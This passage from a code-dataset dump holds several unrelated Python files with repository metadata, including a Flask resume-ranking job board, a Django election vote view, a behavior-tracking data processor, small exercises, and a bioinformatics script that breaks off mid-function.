s.ctrl.idx_reg_en, s.dpath.idx_reg_en )\n s.connect( s.ctrl.knn_mux_sel, s.dpath.knn_mux_sel )\n s.connect( s.ctrl.knn_counter, s.dpath.knn_counter )\n\n def line_trace( s ):\n\n state_str = \"? \"\n if s.ctrl.state.out == s.ctrl.STATE_IDLE:\n state_str = \"IDLE\"\n if s.ctrl.state.out == s.ctrl.STATE_CMP :\n state_str = \"CMP \"\n if s.ctrl.state.out == s.ctrl.STATE_DONE :\n state_str = \"DONE\"\n\n return \"{} ({}>?{} max{} count{} idx_en{} {}) {}\".format(\n s.req,\n s.dpath.knn_data0,\n s.dpath.knn_data1,\n s.resp.msg.data,\n s.dpath.knn_counter,\n s.dpath.idx_reg_en,\n state_str,\n s.resp\n )\n\n","repo_name":"xiaotan2/meng-reconfigurable-computing","sub_path":"digitrec_gen/FindMaxPRTL.py","file_name":"FindMaxPRTL.py","file_ext":"py","file_size_in_byte":7057,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"10221059172","text":"from flask import Blueprint, render_template, request, url_for, redirect, session, jsonify\nfrom flask_pymongo import PyMongo\nfrom werkzeug.utils import secure_filename\nimport os\nfrom bson.objectid import ObjectId\nimport sys,fitz\nimport docx2txt\nfrom database import mongo\nfrom datetime import datetime\nimport jd_profile_comparison\nimport pickle\n\njob_post = Blueprint(\"Job_post\", __name__, static_folder=\"static\", template_folder=\"templates\")\n\nUF = \"static/Job_Description\"\nJOBS = mongo.db.JOBS\nApplied_EMP = mongo.db.Applied_EMP\nresumeFetchedData = mongo.db.resumeFetchedData\njob_compare_obj = pickle.load(open(\"jd_profile_comparison.pkl\",\"rb\"))\ndef allowedExtension(filename):\n return '.' in filename and filename.rsplit('.',1)[1].lower() in ['docx','pdf']\n\ndef extractData(file,ext):\n text=\"\"\n if ext==\"docx\": \n temp = docx2txt.process(file)\n text = [line.replace('\\t', ' ') for line in temp.split('\\n') if line]\n text = ' '.join(text)\n if ext==\"pdf\":\n for page in fitz.open(file):\n text = text + str(page.getText())\n text = \" \".join(text.split('\\n'))\n return text\n@job_post.route(\"/\")\ndef home():\n return \"

test

\"\n\n@job_post.route(\"/post_job\")\ndef JOB_POST():\n fetched_jobs = None\n fetched_jobs = JOBS.find({},{\"_id\":1,\"Job_Profile\":1,\"CompanyName\":1,\"CreatedAt\":1,\"Job_description_file_name\":1,\"LastDate\":1,\"Salary\":1}).sort([(\"CreatedAt\",-1)])\n if fetched_jobs == None:\n return render_template(\"job_post.html\",errorMsg=\"Problem in Jobs Fetched\")\n else:\n jobs={}\n cnt = 0\n for i in fetched_jobs: \n jobs[cnt] = {\"job_id\":i['_id'],\"Job_Profile\":i['Job_Profile'],\"CompanyName\":i['CompanyName'],\"CreatedAt\":i['CreatedAt'],\"Job_description_file_name\":i['Job_description_file_name'],'LastDate':i['LastDate'],\"Salary\":i['Salary'] }\n cnt += 1\n return render_template(\"job_post.html\",len = len(jobs), data = jobs)\n\n@job_post.route(\"/add_job\", methods=[\"POST\"])\ndef ADD_JOB():\n try:\n file = request.files['jd']\n job_profile = str(request.form.get('jp'))\n company = str(request.form.get('company'))\n last_date = str(request.form.get('last_date'))\n salary = str(request.form.get('salary'))\n filename = secure_filename(file.filename)\n jd_id = ObjectId()\n path = os.path.join(UF,str(jd_id))\n os.mkdir(path)\n file.save(os.path.join(path,filename))\n fetchedData = extractData(path+\"/\"+filename,file.filename.rsplit('.',1)[1].lower())\n result = None\n result = JOBS.insert_one({\"_id\":jd_id,\"Job_Profile\":job_profile,\"Job_Description\":fetchedData,\"CompanyName\":company,\"LastDate\":last_date,\"CreatedAt\":datetime.now(),\"Job_description_file_name\":filename,\"Salary\":salary})\n if result == None:\n return render_template(\"job_post.html\",errorMsg=\"Error Ocuured\")\n else:\n return redirect('/HR1/post_job')\n #return render_template(\"job_post.html\",successMsg=\"Job Posted Successfully\")\n \n except Exception:\n print(\"Exception Occured\")\n\n@job_post.route(\"/show_job\")\ndef show_job():\n fetched_jobs = None\n fetched_jobs = JOBS.find({},{\"_id\":1,\"Job_Profile\":1,\"CompanyName\":1,\"CreatedAt\":1,\"Job_description_file_name\":1,\"LastDate\":1,\"Salary\":1}).sort([(\"CreatedAt\",-1)])\n if fetched_jobs == None:\n return render_template(\"All_jobs.html\",errorMsg=\"Problem in Jobs Fetched\")\n else:\n jobs={}\n cnt = 0\n \n for i in fetched_jobs:\n jobs[cnt] = {\"job_id\":i['_id'],\"Job_Profile\":i['Job_Profile'],\"CompanyName\":i['CompanyName'],\"CreatedAt\":i['CreatedAt'],\"Job_description_file_name\":i['Job_description_file_name'],'LastDate':i['LastDate'],\"Salary\":i['Salary']}\n cnt += 1\n return render_template(\"All_jobs.html\",len = len(jobs), data = jobs)\n\n@job_post.route(\"/apply_job\",methods=[\"POST\"])\ndef APPLY_JOB():\n job_id = request.form['job_id']\n jd_data = JOBS.find_one({\"_id\":ObjectId(job_id)},{\"Job_Description\":1})\n emp_data = resumeFetchedData.find_one({\"UserId\":ObjectId(session['user_id'])},{\"ResumeData\":1})\n match_percentage = job_compare_obj.match(str(jd_data['Job_Description']),str(emp_data['ResumeData']))\n result = None\n result = Applied_EMP.insert_one({\"job_id\":ObjectId(job_id),\"user_id\":ObjectId(session['user_id']),\"User_name\":session['user_name'],\"Matching_percentage\":match_percentage})\n if result == None:\n return jsonify({\"StatusCode\":400,\"Message\":\"Problem in Applying\"})\n return jsonify({\"StatusCode\":200,\"Message\":\"Applied Successfully\"})\n\n@job_post.route(\"/view_applied_candidates\",methods=[\"POST\",\"GET\"])\ndef view_applied_candidates():\n job_id = request.form['job_id']\n result_data = None\n result_data = Applied_EMP.find({\"job_id\":ObjectId(job_id)},{\"User_name\":1,\"Matching_percentage\":1}).sort([(\"Matching_percentage\",-1)])\n if result_data == None:\n return {\"StatusCode\":400,\"Message\":\"Problem in Fetching\"}\n else:\n result = {}\n cnt = 0\n result[0]=cnt\n result[1]=200\n for i in result_data:\n result[cnt+2] = {\"Name\":i['User_name'],\"Match\":i['Matching_percentage']}\n cnt+=1\n result[0]=cnt\n print(\"Result\",result,type(result))\n return result","repo_name":"pranavvikh03/ResumeRanker_Shared","sub_path":"Job_post.py","file_name":"Job_post.py","file_ext":"py","file_size_in_byte":5331,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"31"} +{"seq_id":"37591898031","text":"class Solution(object):\n def productExceptSelf(self, nums):\n \"\"\"\n :type nums: List[int]\n :rtype: List[int]\n \"\"\"\n output = list(nums)\n l = len(output)\n # check if list is empty\n if (l == 0):\n return output\n \n # calculate left product of numbers\n for i in range(1, l):\n output[i] *= output[i - 1]\n \n # store right product in rprod and update output \n rprod = 1\n for i in range(l - 1, 0, -1):\n output[i] = output[i - 1] * rprod\n rprod *= nums[i]\n \n output[0] = rprod\n \n return output\n","repo_name":"goelhardik/programming","sub_path":"leetcode/product_of_array_except_self/sol.py","file_name":"sol.py","file_ext":"py","file_size_in_byte":672,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31241063578","text":"# from subprocess import call\nimport subprocess\n\nsubprocess.call('ls')\n\n# time = subprocess.Popen('date', stdout=subprocess.PIPE, stderr=subprocess.PIPE)\n# output, err = time.communicate()\n\ntime = subprocess.check_output('date')\n\nprint('IT is', time)","repo_name":"dlsrks1218/Algorithm_Study","sub_path":"script.py","file_name":"script.py","file_ext":"py","file_size_in_byte":250,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"33262200461","text":"\"\"\"def triangle(a,b,c):\r\n if a<0 or b<0 or c<0:\r\n raise Exception('三角形边长不能为负数')\r\n elif a+b<=c or a+c<=b or b+c<=a:\r\n raise Exception('三角形两边之和需大于第三边')\r\n else:\r\n print('三角形三边长为:',a,b,c)\r\nif __name__ == '__main__':\r\n try:\r\n a=int(input('请输入数字'))\r\n b=int(input('请输入数字'))\r\n c=int(input('请输入数字'))\r\n triangle(a,b,c)\r\n except ValueError as f:\r\n print(f)\r\n圆的面积及周长\r\nimport math\r\nclass Circle:\r\n def __init__(self,r):\r\n self.r=r\r\n\r\n def area(self):\r\n return math.pi*pow(r,2)\r\n def s(self):\r\n return 2*math.pi*r\r\n\r\nif __name__ == '__main__':\r\n r=int(input('请输入半径'))\r\n print('周长为',Circle.s(r))\r\n print('面积为',Circle.area(r))\r\n\r\n print(f'周长为{Circle.s(r):.2f}')\r\n print(f'周长为{Circle.area(r):.2f}')\r\n\"\"\"\r\nclass Student:\r\n def __init__(self,name,age,sex,grade):\r\n self.name=name\r\n self.age=age\r\n self.sex=sex\r\n self.grade=grade\r\n def s(self):\r\n print(self.name,self.age,self.sex,self.grade)\r\n\r\nif __name__ == '__main__':\r\n lst=[]\r\n for i in range(0,5):\r\n info=input(f'请输入第{i+1}为信息(例:姓名#年龄#性别#成绩#)')\r\n ls=info.split('#')\r\n l=Student(ls[0],ls[1],ls[2],ls[3])\r\n lst.append(l)\r\n for item in lst:\r\n item.s()\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n","repo_name":"hialgorithm/python","sub_path":"10月/10.1.py","file_name":"10.1.py","file_ext":"py","file_size_in_byte":1487,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"17897896847","text":"from os import listdir\nfrom sys import argv\nimport pandas as pd\nfrom plotnine import *\nimport numpy as np\nfrom scipy import stats\nimport argparse\nfrom os import path\n\n\ndef group_data_by_mouse(data):\n byMouse = (data.groupby(['Mouse','Genotype', 'Condition','Behavior','Window'])\n .agg('sum').reset_index()\n )\n return (byMouse.sort_values('Window', kind='mergesort')\n .sort_values('Mouse', kind='mergesort')\n .sort_values('Behavior', kind='mergesort')\n .sort_values('Condition', kind='mergesort')\n )\n\ndef flattenHierarchicalCol(col,sep = '_'):\n if not type(col) is tuple:\n return col\n else:\n new_col = ''\n for leveli,level in enumerate(col):\n if not level == '':\n if not leveli == 0:\n new_col += sep\n new_col += level\n return new_col\n\ndef group_and_average_data(data):\n byMouse = group_data_by_mouse(data)\n byWindow = byMouse.groupby(['Genotype', 'Condition', 'Behavior', 'Window']).aggregate([np.mean, np.std, stats.sem]).reset_index()\n byWindow.columns = byWindow.columns.map(flattenHierarchicalCol)\n byWindow['Duration_error_min'] = byWindow['Duration_mean'] - byWindow['Duration_sem']\n byWindow['Duration_error_max'] = byWindow['Duration_mean'] + byWindow['Duration_sem']\n return byWindow\n\ndef makePlot(events, behavior):\n data = group_and_average_data(events)\n plot = (\n ggplot(aes(x='Window', y='Duration_mean', color='Genotype', shape='Condition'),\n data=data[data['Behavior']==behavior])\n + geom_point()\n + geom_line()\n + geom_errorbar(aes(ymin = 'Duration_error_min', ymax='Duration_error_max'))\n )\n return plot\n\ndef parseLine(line):\n parts = line.split(',')\n behavior = parts[0][1:-1].strip()\n status = parts[1].strip()\n latency = int(parts[4].strip())\n mouse = parts[6].strip()\n genotype = 'WT'\n if \"5AR2KO\" in mouse:\n genotype = '5AR2KO'\n condition = \"Exercise\"\n if \"Sedentary\" in mouse:\n condition = \"Sedentary\"\n \n record = {\n 'status': status,\n 'mouse': mouse,\n 'condition': condition,\n 'genotype': genotype,\n 'behavior': behavior,\n 'latency': latency\n }\n\n return record\n\ndef findMatchingEndRecord(lines, startRecord, startLine):\n j = startLine + 1\n while j < len(lines):\n if len(lines[j].strip()) <= 0:\n j = j + 1\n continue\n endRecord = parseLine(lines[j])\n if (endRecord['status'] == 'Ended' and endRecord['behavior'] == startRecord['behavior']):\n break\n j = j + 1\n if j >= len(lines):\n print(\"Error: Record\\n{}\\nhas no matching 'Ended' record\")\n exit()\n return endRecord\n\ndef makeEventRecord(record, window, duration):\n return {\n 'mouse': record['mouse'],\n 'condition': record['condition'],\n 'genotype': record['genotype'],\n 'behavior': record['behavior'],\n 'window': window,\n 'duration': duration\n }\n\ndef bucketData(sourceFiles, windowSize):\n events = []\n for file in sourceFiles:\n with open(file, 'r') as file:\n lines = file.readlines()\n for i in range(3, len(lines)):\n line = lines[i]\n if len(line.strip()) == 0:\n continue\n record = parseLine(line)\n if record['status'] == 'Started':\n endRecord = findMatchingEndRecord(lines, record, i)\n startTime = record['latency']\n endTime = endRecord['latency']\n startWindow = int(startTime / windowSize)\n endWindow = int(endTime / windowSize)\n\n if (startWindow == endWindow):\n duration = endTime - startTime\n else:\n duration = windowSize - startTime % windowSize # duration remaining in starting window\n\n # Compute duration of behavior in last window and create a record\n finalWindowDuration = endTime % windowSize\n if finalWindowDuration > 0: # Only output a record if any time was spent in the ending window\n events.append(makeEventRecord(record, endWindow, finalWindowDuration))\n \n # Add a record for each intermediate (full) window\n for window in range(startWindow+1, endWindow):\n events.append(makeEventRecord(record, window, windowSize))\n # Output a record for the starting window if it is a non-zero amount of time\n if duration > 0:\n events.append(makeEventRecord(record, startWindow, duration))\n return events\n\ndef eventsToDataFrame(events):\n mouse = []\n condition = []\n genotype = []\n behavior = []\n window = []\n duration = []\n for event in events:\n mouse.append(event['mouse'])\n condition.append(event['condition'])\n genotype.append(event['genotype'])\n behavior.append(event['behavior'])\n window.append(event['window'])\n duration.append(event['duration'])\n data = {\n 'Mouse': mouse,\n 'Condition': condition,\n 'Genotype': genotype,\n 'Behavior': behavior,\n 'Window': window,\n 'Duration': duration\n }\n\n return pd.DataFrame(data)\n\nif __name__ == \"__main__\":\n\n parser = argparse.ArgumentParser(description='Process data exported from Behaviortracker.')\n # source dir (default .)\n # windowed csv output file (windowed.csv)\n # window duration (60 seconds)\n # plot behavior (-p Struggling)\n # group by mouse\n # averaged data output\n parser.add_argument('-s', '--source', nargs='+')\n parser.add_argument('-o', '--output', default='bt')\n parser.add_argument('-g', '--graph', nargs='+')\n parser.add_argument('-p', '--period', default=60, type=int)\n parser.add_argument('-w', '--windowedfile', action='store_true')\n parser.add_argument('-m', '--mousefile', action='store_true')\n parser.add_argument('-a', '--averagedfile', action='store_true')\n\n options = parser.parse_args()\n\n print(options)\n\n if options.source == None:\n options.source = ['.']\n sourceFiles = []\n for source in options.source:\n if path.isfile(source):\n sourceFiles.append(source)\n elif path.isdir(source):\n sourceFiles.extend(filter(lambda x: x.endswith('.csv'),listdir(source)))\n else:\n print('Error: {} is not a valid file or directory.'.format(source))\n exit()\n\n events = eventsToDataFrame(bucketData(sourceFiles, options.period))\n\n if options.windowedfile:\n windowFileName = options.output + '_windowed.csv'\n events.to_csv(windowFileName)\n \n if options.mousefile:\n mouseFileName = options.output + '_by_mouse.csv'\n byMouse = group_data_by_mouse(events)\n byMouse.to_csv(mouseFileName)\n \n if options.averagedfile:\n averagedFileName = options.output + '_averaged.csv'\n averaged = group_and_average_data(events)\n averaged.to_csv(averagedFileName)\n \n if options.graph != None:\n for behavior in options.graph:\n plot = makePlot(events, behavior)\n plotName = options.output + '_' + behavior + '_plot.png'\n plot.save(plotName)\n\n \n","repo_name":"deGravity/behaviortracker","sub_path":"behaviortracker/old_version.py","file_name":"old_version.py","file_ext":"py","file_size_in_byte":7501,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"47117653314","text":"#This file serves to extract features from a case's paragraphs\n\nimport sys\nsys.path.append('/home/mia/Nextcloud/individual_project/nlp-legal/nlp_legal_code/code')\nimport pandas as pd \nimport nltk \nnltk.download('punkt')\nfrom nltk.tokenize import RegexpTokenizer\n#For compatibility issues see https://realpython.com/lessons/why-cant-python-find-my-modules/#description\n\n#Update this to the relevant data directory file using search and replace \nimport fetch_2021_data\n#import EDA.raw_text\n\ndef get_wordcount(text): \n tokenizer = RegexpTokenizer(r'\\w+')\n tokens = tokenizer.tokenize(text)\n wordcount = len(tokens)\n return wordcount\n\n\n'''Testing \ntext = \"The burglar said: Thjere wasn't a lot of $$ in the bag.!\"\ntokenizer = RegexpTokenizer(r'\\w+')\ntokens = tokenizer.tokenize(text)\nprint(tokens)\nprint(get_wordcount(text))\n'''\n\ndef get_wordcount_df():\n data= pd.read_csv('raw_text_df.csv', index_col=[0])\n #Alternatively\n #data = EDA.raw_text.get_df()\n\n data['base_case_txt'] = data['base_case_txt'].apply(get_wordcount)\n data['paragraph_txt'] = data['paragraph_txt'].apply(get_wordcount)\n data['decision_txt'] = data['decision_txt'].apply(get_wordcount)\n\n return data\n\n#Export to CSV\n#wordcount_df = get_wordcount_df()\n#wordcount_df.to_csv('word_counts.csv')\n\n#The following is a helper function for counting words of pre_token_df\n\ndef get_tokencount_df():\n data = pd.read_csv('pre_token_df_original.csv', index_col=[0])\n\n data['base_and_par_sent'] = data['base_and_par_sent'].apply(get_wordcount)\n data['decision_sent'] = data['decision_sent'].apply(get_wordcount)\n\n return data\n\n#The following is a helper function for linear_regression.py\ndef get_df(case_id):\n prep_df = fetch_2021_data.get_paragraph_df(case_id)\n\n #Extract simple features from paragraphs \n #Add paragraph text column \n\n prep_df['text'] = 'lorem ipsum'\n\n #Get paragraph directory\n paragraphs_path = fetch_2021_data.get_paragraph_directory_path(case_id)\n no_of_paragraphs = fetch_2021_data.get_number_of_paragraphs(case_id)\n\n #Enter raw text into text column of the df \n for i in range(1, no_of_paragraphs+1):\n #Get filename from df\n filename = prep_df.at[i, 'paragraphs']\n #Create path to file\n filepath = paragraphs_path.joinpath(filename)\n #Read text into df \n prep_df.at[i, 'text'] = filepath.read_text()\n\n\n #Tokenize text and remove stop words \n #https://www.mygreatlearning.com/blog/nltk-tutorial-with-python/\n\n tokens = nltk.word_tokenize(prep_df.at[1,'text'])\n\n from nltk.tokenize import RegexpTokenizer\n tokenizer = RegexpTokenizer(r'\\w+')\n\n #Create a new column with the word count per paragraph\n prep_df['word_count'] = 0\n\n #Enter the word count into the df\n for i in range(1, no_of_paragraphs+1):\n paragraph_text = prep_df.at[i,'text']\n paragraph_tokens = tokenizer.tokenize(paragraph_text)\n no_of_words = len(paragraph_tokens)\n prep_df.at[i, 'word_count'] = no_of_words\n\n #For linear regression, selecting only one independent variable (word_count)\n prep_df.drop(['text', 'paragraphs'], axis=1, inplace=True)\n\n prep_df = prep_df[['word_count', 'entails_decision']]\n\n return prep_df\n\n\n\n\n'''\n#Count the words in common between a paragraph and the base case\n#Base case\n\ndef get_words_in_common(case_id, paragraph_id):\n base_case = fetch_2021_data.get_base_case(case_id = '001')\n base_case_tokens = tokenizer.tokenize(base_case) \n \n words_in_common = []\n\n for i in base_case_tokens:\n for j in paragraph_tokens:\n if i==j:\n words_in_common.append(i)\n\n #Source https://datagy.io/python-remove-duplicates-from-list/#Use_Pandas_to_Remove_Duplicates_from_a_Python_List\n words_in_common = pd.Series(words_in_common).unique().tolist()\n'''\n\n\n\n\n\n\n","repo_name":"miahulla/ICL_2022_Individual_Project","sub_path":"Tools/wordcount.py","file_name":"wordcount.py","file_ext":"py","file_size_in_byte":3840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"7552649202","text":"\"\"\"\nCarga de imágenes\n\"\"\"\nimport numpy as np\nimport cv2\nimport os\n\n\nclass CargadorSimpleDatos:\n def __init__(self, preprocesadores=None):\n self.preprocesadores = preprocesadores\n\n if self.preprocesadores is None:\n self.preprocesadores = []\n\n def cargar(self, rutas_imagenes, verboso=-1):\n datos = []\n etiquetas = []\n\n for i, ruta_imagen in enumerate(rutas_imagenes):\n # Cargar la imagen y extraer la etiqueta de clase asumiendo que\n # la ruta tiene el siguiente formato:\n # /ruta/hacia/imágenes/{clase}/{imagen}.algo\n imagen = cv2.imread(ruta_imagen)\n etiqueta = ruta_imagen.split(os.path.sep)[-2]\n\n # Pre-procesar\n for p in self.preprocesadores:\n imagen = p.preprocesar(imagen)\n\n # Se usará la imagen preprocesada como una \"vector de\n # características\", por lo que lo añadimos a la lista\n # correspondiente junto con su etiqueta correspondiente\n datos.append(imagen)\n etiquetas.append(etiqueta)\n\n # Si 'verboso' es mayor a cero, se puede usar para indicar mensajes\n # que indican el avance del procesamiento.\n # Se muestra el avance cada 'verboso' imágenes\n if verboso > 0 and i > 0 and (i + 1) & verboso == 0:\n print(\"[INFO] processed {}/{}\".format(i + 1, len(rutas_imagenes)))\n\n return (np.array(datos), np.array(etiquetas))\n","repo_name":"saulaxel/managerfias","sub_path":"image_processing/pyimagesearch/datasets/cargador_simple_datos.py","file_name":"cargador_simple_datos.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23759374645","text":"from functools import reduce\nimport json\n\nfrom phe import paillier\n\nfrom django.contrib import messages\nfrom django.db.models import Q\nfrom django.shortcuts import redirect\nfrom django.urls import reverse\nfrom django.utils.decorators import method_decorator\nfrom django.views import View\nfrom django.views.decorators.csrf import csrf_protect\n\nfrom core.decorators import login_required\nfrom core.models import (\n User, Candidate, Vote, VoterProfile\n)\n\n\n@method_decorator(csrf_protect, name='dispatch')\n@method_decorator(\n login_required(\n login_url='/',\n next='',\n redirect_field_name=None\n ),\n name='dispatch',\n)\nclass VoteProcessingView(View):\n \"\"\"\n View that processes votes.\n\n This subview may only process requests from users that are\n logged in and have not voted yet. Users that have voted already and\n anonymous users will be redirected to `/`.\n\n The data format for any POST requests is:\n {\n 'candidates_voted': [\n ,\n ,\n ...\n ]\n }\n\n Receiving invalid data from a user whom have not voted yet will cause the\n view to return an error message. If any data, valid or not, is received\n from a user who has voted already, a message will be returned saying that\n the user has voted already.\n\n View URL: `/vote`\n \"\"\"\n def get(self, request):\n return redirect(reverse('index'))\n\n def post(self, request):\n # Improve this.\n user = self.request.user\n has_user_voted = Vote.objects.filter(user__id=user.id).exists()\n try:\n # `candidates_voted` is expected to be a JSON-stringified array.\n candidates_voted = json.loads(request.POST['candidates_voted'])\n except KeyError:\n if has_user_voted:\n messages.error(\n request,\n 'You are no longer allowed to vote since you have voted '\n 'already. Additionally, the votes you were invalid too.'\n )\n else:\n messages.error(\n request,\n 'The votes you sent were invalid. Please try voting again,'\n ' and/or contact the system administrator.'\n )\n else:\n if has_user_voted:\n messages.error(\n request,\n 'You are no longer allowed to vote since you have voted '\n 'already.'\n )\n else:\n if type(candidates_voted) is list:\n try:\n self._cast_votes(user, candidates_voted)\n except ValueError:\n messages.error(\n request,\n 'The votes you sent were invalid. Please try '\n 'voting again, and/or contact the system '\n 'administrator.'\n )\n else:\n messages.error(\n request,\n 'The votes you sent were invalid. Please try voting '\n 'again, and/or contact the system administrator.'\n )\n\n return redirect(reverse('index'))\n\n def _cast_votes(self, user, candidates_voted):\n # Ensure that there are no duplicate candidates.\n election = user.voter_profile.batch.election\n encountered_candidate_ids = set()\n voted_candidates = list()\n num_selected_candidates_per_position = dict()\n for candidate_id in candidates_voted:\n try:\n candidate = Candidate.objects.get(id=candidate_id)\n except Candidate.DoesNotExist:\n raise ValueError('Voted candidate does not exist.')\n\n position = candidate.position\n\n # Check that there are no duplicate votes and that the candidate\n # IDs passed exist.\n if candidate_id not in encountered_candidate_ids:\n encountered_candidate_ids.add(candidate_id)\n \n candidate_election = candidate.election\n if election == candidate_election:\n pos_name = position.position_name\n if pos_name in num_selected_candidates_per_position:\n num_selected_candidates_per_position[pos_name] += 1\n\n pos_max_selected = position.max_num_selected_candidates\n pos_num_selected = (\n num_selected_candidates_per_position[pos_name]\n )\n if pos_num_selected > pos_max_selected: \n raise ValueError(\n 'Selected more candidates in the same '\n 'position than allowed.'\n )\n else:\n # No need to check if the number of selected candidates\n # in a position has already exceeded the set maximum\n # number, since the maximum number cannot be 0.\n num_selected_candidates_per_position[pos_name] = 1\n \n # Check if the voted candidated can be voted by the voter.\n batch = user.voter_profile.batch\n if (position.target_batches.exists()\n and batch not in position.target_batches.all()):\n raise ValueError(\n 'Voted for candidate whose position cannot be '\n 'voted by the voter.'\n )\n\n voted_candidates.append(candidate) \n else:\n raise ValueError(\n 'Voted for candidate in another election.'\n )\n else:\n raise ValueError('Duplicate candidates IDs submitted.')\n\n # Alright, things have gone well.\n for candidate in voted_candidates:\n Vote.objects.create(\n user=user,\n candidate=candidate,\n election=election\n )\n\n user.voter_profile.has_voted = True\n user.voter_profile.save()\n","repo_name":"seanballais/botos","sub_path":"core/views/vote.py","file_name":"vote.py","file_ext":"py","file_size_in_byte":6452,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"31"} +{"seq_id":"12848734651","text":"from Bio.Seq import Seq\nfrom Bio import SeqIO\nfrom Bio.SeqIO import FastaIO\nfrom Bio import SearchIO\nfrom Bio.SeqRecord import SeqRecord\n\nfrom Bio import AlignIO\n\nimport sys\nimport os\nfrom os import listdir\nfrom os.path import isfile, isdir, join\nimport argparse\nimport pandas as pd\nimport numpy as np\n\nimport subprocess\n\nimport edlib\nimport random\n\nimport HORmon.HORmon_pipeline.utils as utils\n\nMONOIDNT = 95\nINF=10000000\nsd_run = \"stringdecomposer\"\n\ndef load_fasta(filename, tp = \"list\"):\n if tp == \"map\":\n records = SeqIO.to_dict(SeqIO.parse(filename, \"fasta\"))\n for r in records:\n records[r] = records[r].upper()\n else:\n records = list(SeqIO.parse(filename, \"fasta\"))\n for i in range(len(records)):\n records[i] = records[i].upper()\n return records\n\ndef make_record(seq, name, sid, d=\"\"):\n return SeqRecord(seq, id=sid, name=name, description = d)\n\ndef save_fasta(filename, orfs):\n with open(filename, \"w\") as output_handle:\n SeqIO.write(orfs, output_handle, \"fasta\")\n #fasta_out = FastaIO.FastaWriter(output_handle, wrap=None)\n #fasta_out.write_file(orfs)\n\ndef load_monodec(cen):\n dec = []\n monomers = set()\n filename = os.path.join(PATH, \"cen\" + cen + \"_dec.tsv\")\n with open(filename, \"r\") as fin:\n for ln in fin.readlines():\n if len(ln.strip().split(\"\\t\")) < 5:\n continue\n ref, mon, start, end, idnt = ln.strip().split(\"\\t\")[:5]\n dec.append([ref, mon, start, end, idnt])\n monomers.add(mon)\n #dec = revert_rcreads(dec)\n #dec = remove_badreads(dec)\n return dec, monomers\n\ndef load_bedfile(bedfile):\n dec = []\n monomers = set()\n with open(bedfile, \"r\") as fin:\n for ln in fin.readlines():\n if len(ln.strip().split(\"\\t\")) < 6:\n continue\n ref, start, end, mon, idnt, rev = ln.strip().split(\"\\t\")[:6]\n dec.append([ref, mon, start, end, idnt, rev])\n monomers.add(mon)\n return dec, monomers\n\ndef shift(hor_lst):\n min_ind = 0\n for i in range(len(hor_lst)):\n if hor_lst[min_ind] > hor_lst[i]:\n min_ind = i\n break\n return hor_lst[min_ind:] + hor_lst[:min_ind]\n\ndef load_horascycle(filename, log=None):\n if log is not None:\n log.info(\"\\n= Loading HORs cycles =\", indent=1)\n hors = []\n hor_name= \"\"\n mono_mp = {}\n cnt, hor_cnt = 0, 0\n with open(filename, \"r\") as fin:\n for ln in fin.readlines():\n if len(ln.split(\"\\t\")) < 2:\n continue\n hor_name, hor_seq = ln.strip().split(\"\\t\")[:2]\n hor_lst = hor_seq.split(\",\")[:-1]\n #hor_lst = shift(hor_lst)\n if log is None:\n print(hor_lst)\n else:\n log.info(\"Loaded HOR: \" + str(hor_lst), indent=2)\n hors.append([hor_name, hor_lst])\n return hors\n\n\ndef run_clustal(mappings, clustal_dir, pair_name):\n from Bio.Align.Applications import ClustalwCommandline\n from Bio.Align.Applications import ClustalOmegaCommandline\n from Bio import AlignIO\n from Bio.Align import AlignInfo\n from Bio.Align import MultipleSeqAlignment\n\n cluster_seqs_path = os.path.join(clustal_dir, pair_name + \"_seq.fasta\")\n aln_file = os.path.join(clustal_dir, pair_name + \"_seq.clu\")\n if not os.path.isdir(clustal_dir):\n os.makedirs(clustal_dir)\n if len(mappings) == 1:\n save_fasta(cluster_seqs_path, mappings + mappings)\n else:\n save_fasta(cluster_seqs_path, mappings)\n\n cmd = ClustalOmegaCommandline(infile=cluster_seqs_path, outfile=aln_file, force=True, threads=10)\n stdout, stderr = cmd()\n align = AlignIO.read(aln_file, \"fasta\")\n\n summary_align = AlignInfo.SummaryInfo(align)\n consensus = summary_align.gap_consensus(threshold=0, ambiguous='N')\n consensus = str(consensus).replace('-', '')\n return consensus\n\ndef extract_consensus(total_alns):\n consensus = \"\"\n scores = []\n for i in range(len(total_alns[0])):\n score = {\"A\": 0, \"C\": 0, \"G\": 0, \"T\": 0, \"-\": 0}\n for j in range(len(total_alns)):\n score[total_alns[j][i]] += 1\n scores_lst = sorted([[it, score[it]] for it in score ], key = lambda x: -x[1])\n scores.append(scores_lst)\n max_score = scores_lst[0][0]\n if scores_lst[0][1] == scores_lst[1][1]:\n max_score = \"N\"\n if max_score != \"-\":\n consensus += max_score\n return consensus, scores\n\ndef align_mappings(mappings, clustal_dir, pair_name):\n pair_name = pair_name.replace(\"/\", \"_\")\n pair_name = pair_name.replace(\"(\", \"_\")\n pair_name = pair_name.replace(\")\", \"_\")\n pair_name = pair_name.replace(\".\", \"_\")\n pair_name = pair_name.replace(\"&\", \"_\")\n consensus = run_clustal(mappings, clustal_dir, pair_name)\n return consensus\n\ndef edist(lst):\n if len(str(lst[0])) == 0:\n return INF, []\n if len(str(lst[1])) == 0:\n return INF, []\n result = edlib.align(str(lst[0]), str(lst[1]), mode=\"SHW\", task=\"path\", k=100)\n if result[\"editDistance\"] == -1:\n return INF, []\n aln = edlib.getNiceAlignment(result, str(lst[0]), str(lst[1]))\n return result[\"editDistance\"], aln\n\ndef glue_pairs(p1, p2, log=None):\n max_len = 200\n eds = []\n ed, aln = edist([p1[-max_len:], p2])\n longest, longest_ind = 0, -1\n cur_len = 0\n for i in range(len(aln[\"matched_aligned\"])):\n if 